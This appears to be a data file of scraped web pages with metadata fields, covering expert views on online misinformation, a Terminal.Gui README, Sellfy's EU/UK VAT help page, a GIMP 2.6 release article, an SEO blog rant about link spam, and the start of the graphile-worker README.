**Judith Donath**, fellow at Harvard University’s Berkman Klein Center for Internet & Society and founder of the Sociable Media Group at the MIT Media Lab, wrote, “Yes, trusted methods will emerge to block false narratives and allow accurate information to prevail, and, yes, the quality and veracity of information online will deteriorate due to the spread of unreliable, sometimes even dangerous, socially destabilizing ideas. Of course, the definition of ‘true’ is sometimes murky. Experimental scientists have many careful protocols in place to assure the veracity of their work, and the questions they ask have well-defined answers – and still there can be controversy about what is true, what work was free from outside influence. The truth of news stories is far murkier and multi-faceted. A story can be distorted, disproportional, meant to mislead – and still, strictly speaking, factually accurate. … But a pernicious harm of fake news is the doubt it sows about the reliability of all news. Donald Trump’s repeated ‘fake news’ smears of The New York Times, Washington Post, etc., are among his most destructive non-truths.”
#### “Algorithms weaponize rhetoric,” influencing on a mass scale
**Susan Etlinger**, industry analyst at Altimeter Research, said, “There are two main dynamics at play: One is the increasing sophistication and availability of machine learning algorithms and the other is human nature. We’ve known since the ancient Greeks and Romans that people are easily persuaded by rhetoric; that hasn’t changed much in two thousand years. Algorithms weaponize rhetoric, making it easier and faster to influence people on a mass scale. There are many people working on ways to protect the integrity and reliability of information, just as there are cybersecurity experts who are in a constant arms race with cybercriminals, but to put as much emphasis on ‘information’ (a public good) as ‘data’ (a personal asset) will require a pretty big cultural shift. I suspect this will play out differently in different parts of the world.”
#### There’s no technical solution for the fact that ‘news’ is a social bargain
**Clay Shirky**, vice provost for educational technology at New York University, replied, “‘News’ is not a stable category – it is a social bargain. There’s no technical solution for designing a system that prevents people from asserting that Obama is a Muslim but allows them to assert that Jesus loves you.”
#### ‘Strong economic forces are incentivizing the creation and spread of fake news’
**Amy Webb**, author and founder of the Future Today Institute, wrote, “In an era of social, democratized media, we’ve adopted a strange attitude. We’re simultaneously skeptics and true believers. If a news story reaffirms what we already believe, it’s credible – but if it rails against our beliefs, it’s fake. We apply that same logic to experts and sources quoted in stories. With our limbic systems continuously engaged, we’re more likely to pay attention to stories that make us want to fight, take flight or fill our social media accounts with links. As a result, there are strong economic forces incentivizing the creation and spread of fake news. In the digital realm, attention is currency. It’s good for democracy to stop the spread of misinformation, but it’s bad for business. Unless significant measures are taken in the present – and unless all the companies in our digital information ecosystem use strategic foresight to map out the future – I don’t see how fake news could possibly be reduced by 2027.”
#### Propagandists exploit whatever communications channels are available
**Ian Peter**, internet pioneer, historian and activist, observed, “It is not in the interests of either the media or the internet giants who propagate information, nor of governments, to create a climate in which information cannot be manipulated for political, social or economic gain. Propaganda and the desire to distort truth for political and other ends have always been with us and will adapt to any form of new media which allows open communication and information flows.”
#### Expanding information outlets erode opportunities for a ‘common narrative’
#### ‘Broken as it might be, the internet is still capable of routing around damage’
**Paul Saffo**, longtime Silicon-Valley-based technology forecaster, commented, “The information crisis happened in the shadows. Now that the issue is visible as a clear and urgent danger, activists and people who see a business opportunity will begin to focus on it. Broken as it might be, the internet is still capable of routing around damage.”
#### It will be impossible to distinguish between fake and real video, audio, photos
**Marina Gorbis**, executive director of the Institute for the Future, predicted, “It’s not going to be better or worse but very different. Already we are developing technologies that make it impossible to distinguish between fake and real video, fake and real photographs, etc. We will have to evolve new tools for authentication and verification. We will probably have to evolve both new social norms as well as regulatory mechanisms if we want to maintain online environment as a source of information that many people can rely on.”
#### A ‘Cambrian explosion’ of techniques will arise to monitor the web and non-web sources
**Stowe Boyd**, futurist, publisher and editor-in-chief of Work Futures, said, “The rapid rise of AI will lead to a Cambrian explosion of techniques to monitor the web and non-web media sources and social networks and rapidly identifying and tagging fake and misleading content.”
#### Well, there’s good news and bad news about the information future …
**Jeff Jarvis**, professor at the City University of New York’s Graduate School of Journalism, commented, “Reasons for hope: Much attention is being directed at manipulation and disinformation; the platforms may begin to recognize and favor quality; and we are still at the early stage of negotiating norms and mores around responsible civil conversation. Reasons for pessimism: Imploding trust in institutions; institutions that do not recognize the need to radically change to regain trust; and business models that favor volume over value.”
#### A fear of the imposition of pervasive censorship
**Jim Warren**, an internet pioneer and open-government/open-records/open-meetings advocate, said, “False and misleading information has always been part of all cultures (gossip, tabloids, etc.). Teaching judgment has always been the solution, and it always will be. I (still) trust the longstanding principle of free speech: The best cure for ‘offensive’ speech is MORE speech. The only major fear I have is of massive communications conglomerates imposing pervasive censorship.”
#### People have to take responsibility for finding reliable sources
**Steven Miller**, vice provost for research at Singapore Management University, wrote, “Even now, if one wants to find reliable sources, one has no problem doing that, so we do not lack reliable sources of news today. It is that there are all these other options, and people can choose to live in worlds where they ignore so-called reliable sources, or ignore a multiplicity of sources that can be compared, and focus on what they want to believe. That type of situation will continue. Five or 10 years from now, I expect there to continue to be many reliable sources of news, and a multiplicity of sources. Those who want to seek out reliable sources will have no problems doing so. Those who want to make sure they are getting a multiplicity of sources to see the range of inputs, and to sort through various types of inputs, will be able to do so, but I also expect that those who want to be in the game of influencing perceptions of reality and changing the perceptions of reality will also have ample means to do so. So the responsibility is with the person who is seeking the news and trying to get information on what is going on. We need more individuals who take responsibility for getting reliable sources.” | true | true | true | Experts are split on whether the coming years will see less misinformation online. Those who foresee improvement hope for technological and societal solutions. Others say bad actors using technology can exploit human vulnerabilities. | 2024-10-12 00:00:00 | 2017-10-19 00:00:00 | article | pewresearch.org | Pew Research Center | null | null |
|
3,447,547 | http://www.kym4.com/2/post/2012/01/stop-marketing-start-engaging-lessons-learned-from-unmarketing.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
3,648,217 | http://www.extremetech.com/computing/120395-windows-8-consumer-preview-download | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
4,562,561 | http://euobserver.com/foreign/117553 | Intelligence chief: EU capital is 'spy capital' | Andrew Rettman | "I stopped meeting him for lunch because all he did was ask questions and he never said anything about himself," a diplomat on the EU Council's working group for post-Soviet countries once told this website about his friend from the Russian embassy.
In the age of foreign policy "resets" and "win-win" talks, espionage sounds like a thing of the past.
But for Alain Winants, the head of Belgium's state security service, the VSSE, the EU capital currently has more spy activity than a...
Andrew Rettman is EUobserver's foreign editor, writing about foreign and security issues since 2005. He is Polish, but grew up in the UK, and lives in Brussels. He has also written for The Guardian, The Times of London, and Intelligence Online.
16,405,644 | https://github.com/migueldeicaza/gui.cs#guics---terminal-ui-toolkit-for-net | GitHub - gui-cs/Terminal.Gui: Cross Platform Terminal UI toolkit for .NET | Gui-Cs | - The current, stable, release of Terminal.Gui v1 is .
- The current `prealpha` release of Terminal.Gui v2 can be found on Nuget.
- Developers starting new TUI projects are encouraged to target `v2`. The API is significantly changed, and significantly improved. There will be breaking changes in the API before Beta, but the core API is stable. `v1` is in maintenance mode and we will only accept PRs for issues impacting existing functionality.
**Terminal.Gui**: A toolkit for building rich console apps for .NET, .NET Core, and Mono that works on Windows, the Mac, and Linux/Unix.
Paste these commands into your favorite terminal on Windows, Mac, or Linux. This will install the Terminal.Gui.Templates, create a new "Hello World" TUI app, and run it.
(Press `CTRL-Q`
to exit the app)
```
dotnet new --install Terminal.Gui.templates
dotnet new tui -n myproj
cd myproj
dotnet run
```
The above documentation matches the most recent Nuget release from the `v2_develop`
branch. Get the v1 documentation here.
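For orientation, the "Hello World" app the template creates boils down to a few lines. The following is a rough, hand-written sketch — illustrative only, since API details differ between v1 and the v2 prealpha:

```
// Illustrative sketch of a minimal Terminal.Gui app, roughly what the template produces.
// Adjust to the version you target; property and method names shown here follow the v2-style
// example later in this README.
using Terminal.Gui;

Application.Init ();
var win = new Window { Title = "Hello (Ctrl+Q to quit)" };
win.Add (new Label { Text = "Hello, Terminal.Gui!", X = Pos.Center (), Y = Pos.Center () });
Application.Run (win);
win.Dispose ();
Application.Shutdown ();
```

Press `CTRL-Q` (the default `Application.QuitKey`) to exit the app.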
See the `Terminal.Gui/`
README for an overview of how the library is structured.
**Terminal.Gui** can be used with any .Net language to create feature rich and robust applications.
Showcase is a place where you can find all kind of projects from simple examples to advanced real world apps that fully utilize capabilities of the toolkit.
The team is looking forward to seeing new amazing projects made by the community to be added there!
The following example shows a basic Terminal.Gui application in C#:
```
// This is a simple example application. For the full range of functionality
// see the UICatalog project
// A simple Terminal.Gui example in C# - using C# 9.0 Top-level statements
using System;
using Terminal.Gui;
Application.Run<ExampleWindow> ().Dispose ();
// Before the application exits, reset Terminal.Gui for clean shutdown
Application.Shutdown ();
// To see this output on the screen it must be done after shutdown,
// which restores the previous screen.
Console.WriteLine ($@"Username: {ExampleWindow.UserName}");
// Defines a top-level window with border and title
public class ExampleWindow : Window
{
public static string UserName;
public ExampleWindow ()
{
Title = $"Example App ({Application.QuitKey} to quit)";
// Create input components and labels
var usernameLabel = new Label { Text = "Username:" };
var userNameText = new TextField
{
// Position text field adjacent to the label
X = Pos.Right (usernameLabel) + 1,
// Fill remaining horizontal space
Width = Dim.Fill ()
};
var passwordLabel = new Label
{
Text = "Password:", X = Pos.Left (usernameLabel), Y = Pos.Bottom (usernameLabel) + 1
};
var passwordText = new TextField
{
Secret = true,
// align with the text box above
X = Pos.Left (userNameText),
Y = Pos.Top (passwordLabel),
Width = Dim.Fill ()
};
// Create login button
var btnLogin = new Button
{
Text = "Login",
Y = Pos.Bottom (passwordLabel) + 1,
// center the login button horizontally
X = Pos.Center (),
IsDefault = true
};
// When login button is clicked display a message popup
btnLogin.Accept += (s, e) =>
{
if (userNameText.Text == "admin" && passwordText.Text == "password")
{
MessageBox.Query ("Logging In", "Login Successful", "Ok");
UserName = userNameText.Text;
Application.RequestStop ();
}
else
{
MessageBox.ErrorQuery ("Logging In", "Incorrect username or password", "Ok");
}
};
// Add the views to the Window
Add (usernameLabel, userNameText, passwordLabel, passwordText, btnLogin);
}
}
```
When run the application looks as follows:
Use NuGet to install the `Terminal.Gui`
NuGet package: https://www.nuget.org/packages/Terminal.Gui
To install Terminal.Gui into a .NET Core project, use the `dotnet`
CLI tool with this command.
```
dotnet add package Terminal.Gui
```
Or, you can use the Terminal.Gui.Templates.
See CONTRIBUTING.md.
Debates on architecture and design can be found in Issues tagged with design.
See gui-cs for how this project came to be.
8,791,750 | http://blog.sellfy.com/new-eu-vat-rules/ | How does Sellfy handle the EU VAT laws and Brexit? | Sellfy UAB | # How does Sellfy handle the EU VAT laws and Brexit?
**In this article:**
How do I comply with both EU and UK VAT laws as a seller?
What does Sellfy do to help me with VAT?
How do I enable VAT collection?
How do I register to sell as a VAT Mini One Stop Shop (VAT MOSS)?
How do I block sales from the EU or the UK?
The VAT MOSS and UK VAT data reports
Further reading for VAT-related topics
## How do I comply with both EU and UK VAT laws as a seller?
Both the European Union and the United Kingdom charge VAT (value-added tax) on digital and physical product sales. This tax is charged based on the country where the buyer is located, as opposed to the seller's location. The rules for each of these taxes vary; for any questions, please contact your local tax authority.
**Important!** As of January 1st, 2021, the United Kingdom has completed its "Brexit" transition period and is no longer a member of the EU, so it has its own rules regarding tax collection and reporting. This affects the taxes both for those *located in* and *selling to* the United Kingdom.
As a seller of digital or physical goods, your options will differ depending on where you are located.
#### Located outside of the EU (United States, United Kingdom, Canada)
- To sell in the UK, you will register with HMRC and collect UK VAT on orders
- To sell in the EU, you will need to register for a Non-union scheme VAT MOSS or VAT mini-one-stop-shop (Generally considered easiest!) or register to pay VAT in every EU member state in which you sell
- Alternatively, you may stop selling to the customers in the EU or UK altogether
#### Located in the European Union
- To sell in the EU, you will need to register for a VAT MOSS or VAT mini-one-stop-shop (Generally considered easiest!) or register to pay VAT in every EU member state in which you sell
- To sell in the UK, you will register with HMRC and collect UK VAT on orders
- Alternatively, you may stop selling to the customers in the EU or UK altogether
If you decide that you will be selling to the UK and the EU, make sure to enable the tax collection in your Taxes section.
**Note:** This is not legal advice. If you have questions or concerns, please consult your lawyer and/or accountant, who will be in a better position to advise you on your legal rights and liabilities.
## What does Sellfy do to help me with VAT?
Sellfy helps you maintain compliance with the new regulations. We'll make it easy for you to collect VAT on any order placed in the EU. We'll **identify the buyer's location**, **charge the appropriate tax** and **provide a VAT MOSS report** that contains all the information that you need for your single calendar quarterly return. See here how to enable the collection of this information in Tax Settings.
#### Determining the buyer's location
Following both HMRC and European Commission requirements, we store two non-contradictory identifiers of the buyer’s location, based on:
- The IP address
- Customer’s own choice of a country
- Credit card (or Paypal) information
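As a rough illustration of the "two non-contradictory identifiers" rule above, a checkout system might only accept a country when at least two independent signals agree. This is a hypothetical helper, not Sellfy's actual implementation:

```
// Hypothetical sketch of the "two non-contradictory location identifiers" rule described above.
// This is not Sellfy's code; names and logic are invented for illustration.
using System;
using System.Linq;

class BuyerLocation
{
    // Returns the buyer's country only if at least two independent signals agree.
    public static string Determine (string ipCountry, string selfDeclaredCountry, string paymentCountry)
    {
        var signals = new[] { ipCountry, selfDeclaredCountry, paymentCountry }
            .Where (c => !string.IsNullOrEmpty (c))
            .Select (c => c.ToUpperInvariant ());

        return signals.GroupBy (c => c)
                      .Where (g => g.Count () >= 2)
                      .Select (g => g.Key)
                      .FirstOrDefault (); // null => evidence is missing or contradictory
    }

    static void Main ()
    {
        Console.WriteLine (Determine ("DE", "DE", "FR") ?? "undetermined"); // DE
        Console.WriteLine (Determine ("DE", "FR", "GB") ?? "undetermined"); // undetermined
    }
}
```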
#### Charging the appropriate tax for the EU
We'll do the messy work for **EU VAT** collection and keep track of all current tax rates for each EU country. Once a buyer's location is determined, we charge the right percentage of tax for that country. Keep in mind that you won't be able to edit the VAT rates for individual countries; we'll make sure that all the rates are up to date.
For **UK VAT** collection, we will set the correct rate; just select **Add new** to add the United Kingdom to your list of locations for tax collection.
If you have any questions on this, feel free to email [email protected].
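To make the mechanics concrete: destination-based VAT amounts to looking up the buyer country's rate and applying it to the order (optionally backing the tax out of a VAT-inclusive price). The sketch below is illustrative only — the rates are examples that go stale, and this is not Sellfy's code:

```
// Hypothetical sketch of destination-based VAT: rate lookup by buyer country, then tax on the order.
// Rates are examples only; a real system must track the current official rates per country.
using System;
using System.Collections.Generic;

class VatCalculator
{
    static readonly Dictionary<string, decimal> Rates = new ()
    {
        ["DE"] = 0.19m,  // Germany standard rate (illustrative)
        ["FR"] = 0.20m,  // France
        ["GB"] = 0.20m,  // United Kingdom
    };

    public static (decimal tax, decimal total) Charge (decimal subtotal, string buyerCountry,
                                                       bool taxIncludedInPrice = false)
    {
        decimal rate = Rates.TryGetValue (buyerCountry, out var r) ? r : 0m;

        if (!taxIncludedInPrice)
        {
            decimal tax = Math.Round (subtotal * rate, 2);
            return (tax, subtotal + tax);
        }

        // Price already contains VAT: back the tax amount out of the gross price.
        decimal net = Math.Round (subtotal / (1 + rate), 2);
        return (subtotal - net, subtotal);
    }

    static void Main ()
    {
        var (tax, total) = Charge (10.00m, "DE");
        Console.WriteLine ($"tax {tax}, total {total}"); // tax 1.90, total 11.90
    }
}
```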
#### Provide a UK VAT and VAT MOSS data report
If you choose to sell to the UK, then you'll be able to pull a report with any UK VAT collected. You'll need to submit a UK VAT return and any payments due to HM Revenue and Customs (HMRC) on a quarterly basis.
If you choose to go ahead with VAT MOSS, you’ll only have to submit a *single calendar quarterly return* and VAT payment and the Member State will then take care of the rest, by sending all the “appropriate information and payment to each relevant member state’s tax authority.” We'll compile all needed information into one report, that you export whenever you need it. Read more here.
## How do I enable VAT collection?
To start collecting taxes and collect the information needed for VAT, you'll:
- Go to your
**Store Settings** - Select
**Taxes** **Enable tax**in your store- Enable sales from the EU and/or the UK
- If selling to the UK add this location
- Optionally, you can select for these taxes to be included in the product price and/or charge taxes on your shipping costs as well.
- Press
**Save**
## How do I register to sell as a VAT Mini One Stop Shop (VAT MOSS)?
**Important! **UK businesses that had been using the UK VAT MOSS union scheme can continue to use the system but must register for the VAT MOSS non-union scheme in an EU member state.
To register for the VAT MOSS, please go here: EU VAT MOSS scheme registration.
Please remember, we aren't tax advisors, so we won't be able to guide you on your business choices, instead, you'll ask an attorney or your tax accountant. For more information and a full list of MOSS registration portals, including one in your country, visit the European Commission website.
If you choose to go ahead with VAT MOSS, you’ll only have to submit a *single calendar quarterly return* and VAT payment and the Member State will then take care of the rest, by sending all the “appropriate information and payment to each relevant member state’s tax authority.”
After you register, we'll help you collect the required EU VAT taxes. Read how to enable VAT collection here. For UK VAT, be sure to manually set the tax rates.
## How do I block sales from the EU or the UK?
If you'd rather stop selling in the EU and/or the UK rather than register for paying the respective VAT, you can easily do so! Follow the steps below.
- Log in to your
**Sellfy account** - Navigate to your
**Store Settings** - Select
**Taxes** **Enable tax**in your store**Choose "Don't allow purchase from European Union" and/or "Don't allow purchases from the United Kingdom".**- Press
**Save**
This will block all purchases from the EU and/or the UK, which means that you don't need to collect, register or report VAT for either. Please remember that we are not tax advisors, so if you have concerns or questions, please contact an attorney or an accountant.
## The VAT MOSS and UK data reports
If you've enabled your Taxes Sellfy collects information required for UK VAT and VAT MOSS reports and then provides this data to you for tax purposes. The report is accessible to you at any time in your Sellfy account and can be generated based on custom months and years. You'll simply export the report.
This report will contain:
- The countries where your buyers were located
- The subtotal of a purchase
- Tax amount charged
- Purchase Total
- The currency of the purchase
To export either report:
- Log in to your
**Sellfy Account** - Navigate to
**Store Settings >****Taxes** - Scroll down to
**VAT MOSS report** - Select the region, month(s), and year from the dropdown menu
- Click
**Export data**
## Further Reading
Here are some helpful links for you to read further about these new regulations affecting your business practices. These sites are not affiliated with Sellfy, but may offer you further insight!
Articles on EU VAT
The Guardian article on New EU VAT regulations
EU-VAT GitHub repo with relevant links
Articles on UK VAT and Brexit
321,450 | http://arstechnica.com/news.ars/post/20081001-gimp-2-6-released-one-step-closer-to-taking-on-photoshop.html | GIMP 2.6 released, one step closer to taking on Photoshop | Ryan Paul | A new release of the venerable GNU Image Manipulation Program (GIMP) is now available for download. Version 2.6 offers a variety of new features, user interface improvements, and is also the first release to include support for the Generic Graphics Library (GEGL), a powerful, graph-based image editing framework.
The GIMP is an open source graphics editor that is available for Linux, Windows, and OS X. It aims to provide Photoshop-like capabilities and offers a broad feature set that has made it popular with amateur artists and open source fans. Although the GIMP is generally not regarded as a sufficient replacement for high-end commercial tools, it is beginning to gain some acceptance in the pro market.
One of the most significant limitations of the GIMP is that it has traditionally only supported 8 bits per color channel. This weakness is commonly cited as a major barrier to GIMP adoption by professional artists, who require greater color depth. This problem has finally been addressed by the new GEGL backend, which delivers support for 32-bpc. The inclusion of GEGL is a major milestone for the GIMP and takes it one step closer to being a viable Photoshop replacement for professional users. In this release, GEGL is still not quite ready to be enabled by default, but users can turn it on with a special option.
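To see why channel depth matters, consider what happens when a continuous channel value is squeezed into 8 bits and read back — the rounding step below is exactly the kind of error that accumulates over repeated edits (the numbers are made up purely for illustration):

```
// Illustrative only: why 8 bits per channel loses precision that a 32-bit float channel keeps.
using System;

class ChannelDepthDemo
{
    static void Main ()
    {
        double channel = 0.123456789;                        // a channel value in [0, 1]

        byte as8Bit = (byte)Math.Round (channel * 255.0);    // what an 8-bpc pipeline stores
        double roundTripped = as8Bit / 255.0;                // what you get back

        Console.WriteLine ($"original:     {channel}");
        Console.WriteLine ($"8-bit stored: {as8Bit} -> {roundTripped:F9}");
        Console.WriteLine ($"error:        {Math.Abs (channel - roundTripped):E3}");
        // A floating-point channel (as in GEGL's 32-bpc pipeline) keeps far more precision,
        // so repeated operations accumulate much less rounding error than 1/255 steps.
    }
}
```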
GIMP 2.6 also includes some minor user interface enhancements. The application menu in the tool palette window has been removed, and its contents have been merged into the document window menu. A document window will now be displayed at all times, even when no images are open. The floating tool windows have also been adjusted so that they are always displayed over the document window and cannot be obscured. To reduce clutter and make the windows easier to manage, the floating windows will no longer be listed in the taskbar.
1,471,227 | http://www.searchenginepeople.com/blog/google-stop-the-rot-please.html | Google Stop The Rot Please | Bwelford; Barry Welford | ## Sorry For The Rant
Some may see this post as a rant, and to an extent it is. However it reflects a feeling I have on many occasions and I am sure many others feel the same. I will describe the trigger for this rant a little later in the post, but let us explore why anyone might be upset at some of the things that Google does.
## Google Irritations
It is not difficult to find topics on which Google products generate often strong concerns. You have for example Google Maps, which is notorious for having incorrect information. In this part of the continent, the biggest boo-boo was the omission of the Golden Ears Bridge for almost twelve months after it was in operation. However there are many other errors as can be seen by checking the Help Forum on Google Maps.
Nor are we talking about Google Street View and the privacy concerns that people have raised. When it comes to eavesdropping on broadband communications, it is not surprising that strong resentments arise.
You also can get some off-the-wall products when you allow your engineers to pursue their own passions under that famous 20-percent time rule.
We offer our engineers "20-percent time" so that they are free to work on what they are really passionate about. Google Suggest, AdSense for Content and Orkut are among the many products of this perk.
Google Buzz was one of these frustrating diversions, which never seemed to attract many adherents. This rant is not about one of these peripheral applications but relates instead to the very core of their principal business, Search.
## What Is Wrong With Google Search
Google is continually making innovations in the way it displays search results. One such innovation was universal search, where a simple query might produce results not only from regular web pages but also from news and videos. More recently it has changed the look of the search results pages quite dramatically with a three-column layout. It also produces personalized results, whereby no two people will necessarily get the same result when they do a keyword search.
None of these innovations are particularly irritating and indeed sometimes improve the value to the searcher. What is irritating about Google search goes to the very heart of its algorithms.
Perhaps one of the three similar e-mails I received today can give you a clue on what is my main beef with Google. This was the trigger that pushed me to write this post today, but it could have happened on many other days. It started off as follows:
Dear Sir \ Madam,
We are a Delhi-NCR, India based, and leading web services company with main competency in link building.
We have a dedicated team of 30 professionals to serve you. We build the natural quality and theme based links as one-way or reciprocals links with our manual process.
We always adopt the ETHICAL LINK building process/white hat technique; also follow the guidelines of Google and major search engine for SEO result.
Website theme doesn't matter for us, we can manage any theme, and currently we are running finance /Education / SEO/ IT/ Computer/ Gift/ law/ insurance/ Arts/ Casinos/ Automotive/Pet/ Travel and site etc.
We strictly work on performance basis and can assure you of getting quality links for your site as well. Our links building service will help to increase the link popularity of your website.
What we are dealing with here are spam messages from self-styled link experts.
## The Link Industry
The actions of Google have indeed created a whole new industry. Many people now believe that the rule for getting higher rankings in Google search results is to have as many links as possible to your website. To meet this new demand, some webmasters even create web directories to multiply the linking possibilities.
Given that it is tedious work, a whole new set of link experts has emerged to handle these dissatisfying chores.
## How Did Google Create This Link Industry?
This link industry is very much a Google creation, even though they might wish it were not so. PageRank, which they have promoted strongly as the defining principle of their search approach, is boosted by having more inlinks to a web page. Unfortunately Google has compounded the problem by being somewhat mysterious about how exactly links may influence PageRank calculations. They defend their approach by indicating that to reveal too much information could cause some to take actions to ensure that their Web pages rank higher than they deserve, given their content.
This lack of clarity has had an unfortunate effect. There is a prevailing view that any link is worth something, provided it does not come from a bad neighborhood. There are as a result many people who would give credence to the arguments presented in the e-mail message above. If anything the situation seems to get worse and worse.
The result is a lose / lose / lose proposition for all. The search engines have difficulty distilling the useful, original-content websites from the hordes of websites created purely to generate extra links. Reputable SEO advisors are presented with new challenges in trying to persuade their clients that piling up links does not justify the effort of establishing them. Thirdly, searchers may well find that keyword searches produce less relevant results amid this mounting tide of irrelevant rubbish.
## Google Should Clean Up Its Mess
Since this intolerable situation has been created by Google, it is not unreasonable that they should attempt to clean up the mess.
Google maintains an aura of mystery around its methodology so it is difficult for others to comment. However the following proposal is offered as a way of trying to give a very clear message that this ever increasing plethora of links is valueless and people should spend no time or effort on them.
The key element in the proposal is a two-step process for handling the PageRank component of the Google algorithm.
- Step 1: Calculate PageRank for all links as at present.
- Step 2: In the Google algorithm, a Modified PageRank should be used. For all links with a PageRank value below a certain cut-off value, the Modified PageRank would be set at 0. In effect such links are valueless in terms of PageRank contribution for the algorithm.
Clearly this proposal is made without detailed knowledge of the algorithmic mechanisms that Google is using and so may not be applicable. However it may be that with such knowledge an alternative approach can be derived that delivers the same effect. The effect required is that the vast proportion of links have zero value in terms of the algorithm.
In all probability, nothing of value would be lost in this approach. Authoritative links that had attracted a significant amount of PageRank would not be affected.
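To make the intent of the two-step idea concrete, here is a rough TypeScript sketch of an ordinary PageRank computation followed by the proposed cut-off. It is purely illustrative: the graph representation, damping factor and cut-off value are invented, and it implies nothing about how Google actually computes or uses PageRank.

```typescript
// Illustrative only: a plain iterative PageRank over a tiny link graph,
// followed by the proposed "Modified PageRank" step that treats anything
// below a cut-off value as worth nothing.
type Graph = Map<string, string[]>; // page -> pages it links to

function pageRank(graph: Graph, damping = 0.85, iterations = 50): Map<string, number> {
  const pages = [...graph.keys()];
  const n = pages.length;
  let rank = new Map(pages.map((p) => [p, 1 / n] as [string, number]));

  for (let i = 0; i < iterations; i++) {
    const next = new Map(pages.map((p) => [p, (1 - damping) / n] as [string, number]));
    for (const [page, links] of graph) {
      const share = (rank.get(page) ?? 0) / (links.length || 1); // crude handling of dangling pages
      for (const target of links) {
        next.set(target, (next.get(target) ?? 0) + damping * share);
      }
    }
    rank = next;
  }
  return rank;
}

// Step 2 of the proposal: below the cut-off, a page's accumulated PageRank
// contributes nothing to the ranking algorithm.
function modifiedPageRank(rank: Map<string, number>, cutoff: number): Map<string, number> {
  return new Map(
    [...rank].map(([page, score]) => [page, score < cutoff ? 0 : score] as [string, number])
  );
}
```

The point of the sketch is simply that the first step stays exactly as it is today; only a final thresholding pass changes which links end up carrying any weight.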
## Google Should Publicize This New Search Basis Widely
If Google can implement a scheme whereby only authoritative links are taken into account in the algorithm, then this is something that should be publicized strongly. The effect on search results is also likely to be positive, but the main effect would be the removal of those who attempt to sell massive link building services.
At the same time Google could also stop showing the toolbar PageRank, which seems to have few positive attributes and many negative effects. This too would help to suppress the linking spam agents.
While it is in a clean-up frame of mind, it might even consider removing the "I'm feeling lucky" button on its classical search page since this is very rarely used by anyone. However since it seems to be part of the corporate psyche, its removal is perhaps no more likely than Google accepting the main proposal here to deal with spammy links.
I agree and have written about this a few times in the past year.
http://www.blindfiveyearold.com/the-link-bubble
http://www.blindfiveyearold.com/google-heisenberg-problem
Google did create the problem and I think they're beginning to address it. They're attacking the type of links you reference – the low-value, astroturf type of link generators. Have they neutralized these in the algorithm? No. But I think they're making progress.
I’m more concerned with the bigger players. Folks like Demand Media, who I see less as a content farm and more as a link factory. Bigger enterprises can create processes and networks that drive faux trust and authority, drowning out the real signal.
How will Google address link factories, or links between parent and subsidiary companies? Or will Google find a different, or better way to measure trust and authority?
I don’t know, but Google should figure it out … and quick.
.-= AJ Kohn recently posted: Google AJAX Search Results =-.
What about small, new, local sites that would logically get links mainly from other small, local sites? Should their rankings be based solely on content? Shouldn't such a site with more low-PR links get higher rankings than another, similar site with fewer low-PR links?
.-= Cathy Reisenwitz recently posted: Add a privacy policy for that extra SEO oomph =-.
That’s a good point, Cathy. However I believe that the PageRank concept for non-authoritative web pages has been completely polluted by the mass link creators. So yes I do believe that they should rely on content. Of course their competitors must do so as well, so the playing field is level.
.-= Barry Welford recently posted: Google Duplicate Content And WordPress – An Unresolved Problem =-.
While I think that Google’s algo isn’t perfect, to think that you somehow hold the magical key that will somehow eliminate spam, paid links, and create a better index is simply absurd.
Google knows more about the positives and negatives to their approach than you do, and I can guarantee that they deliberate how to improve things on a regular basis.
Search would be nothing without taking into consideration inbound links, bottom-line. There is currently no other way to determine who ranks. Maybe you have outsmarted the entire Google search team and have a unique idea, probably not.
Do you even practice real seo?
Hardly a magical key. 🙂 Just a small suggestion for improving results.
I fear, dear Roland, you were not reading carefully. I was not suggesting that all inlinks should be disregarded and I never mentioned paid links.
.-= Barry Welford recently posted: Google Duplicate Content And WordPress – An Unresolved Problem =-.
What you are suggesting is that Google created its own mess…? Not sure that I fully agree. Google tries to set rules to govern their search results. They have said over and over that buying or building artificial links is bad and your site will be penalized for it. Webmasters on the other hand look at the situation and see the sign that says “Sharks. Swim at your own risk.” and decide to jump in and take the risk since there is a treasure chest sitting on the ocean floor.
Can we really blame the government for speeding just because they set a speed limit? Or perhaps the speeding is a result of insufficient police officers to patrol the streets.
I feel that perhaps it is a group effort. I believe that google is doing the best they can. I am as frustrated as anyone else that links rule the world, but I do see the logic behind it.
And a little tip from SMX, there are many that are hearing Google’s underlying message that directories and content farms are being weeded out.
.-= Thos003 recently posted: Pest Control Links =-.
Thos003, I don’t feel your government example is an exact analogy. It was Google alone that said that inlinks have importance as a measure of the relevance of web pages. By saying that, rather than keeping their finding a trade secret, they caused a major distortion on the way the Internet has developed. It wouldn’t matter if they were ASK and had only a minor share of the search market. It becomes catastrophic when they dominate by far the search market. They planted the seeds that would destroy the value of their approach. By now, I think the PageRank approach has little merit. However it’s become their key marketing tool and they are unlikely to abandon it. If they did, what distinguishes them from Bing and Yahoo?
.-= Barry Welford recently posted: Google Duplicate Content And WordPress – An Unresolved Problem =-.
Yeah, it’s a rant. And I agree that it’s a mess. I get a dozen emails like that every day and I’ve learned a long time ago that they aren’t worth the paper they’ll never be printed on. But the fact is that whatever Google does, these guys will be there, riding their coattails.
Ironically, I think Google watches more closely those authoritative sites (PR8, PR9, for example) for signs of link-selling. | true | true | true | The format of the Google algorithm with its PageRank emphasis on inlinks encourages spammy linking activity. A solution is proposed to stop this. | 2024-10-12 00:00:00 | 2010-06-29 00:00:00 | article | searchenginepeople.com | Search Engine People Blog | null | null |
|
23,589,987 | https://github.com/graphile/worker | GitHub - graphile/worker: High performance Node.js/PostgreSQL job queue (also suitable for getting jobs generated by PostgreSQL triggers/functions out into a different work queue) | Graphile | Job queue for PostgreSQL running on Node.js - allows you to run jobs (e.g. sending emails, performing calculations, generating PDFs, etc) "in the background" so that your HTTP response/application code is not held up. Can be used with any PostgreSQL-backed application. Pairs beautifully with PostGraphile or PostgREST.
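As a rough sketch of how that is typically wired up in application code (based on the library's documented quick-start shape; the option and helper names shown are assumptions and may differ between versions):

```typescript
import { run, quickAddJob } from "graphile-worker";

async function main() {
  // Worker process: watches the jobs table and runs matching task functions.
  const runner = await run({
    connectionString: "postgres:///my_db", // assumption: point at your own database
    concurrency: 5,
    taskList: {
      // Task name -> handler; the payload comes from whoever queued the job.
      send_email: async (payload: any, helpers) => {
        helpers.logger.info(`Pretending to send an email to ${payload.to}`);
      },
    },
  });
  await runner.promise; // keep processing jobs until the runner is stopped
}

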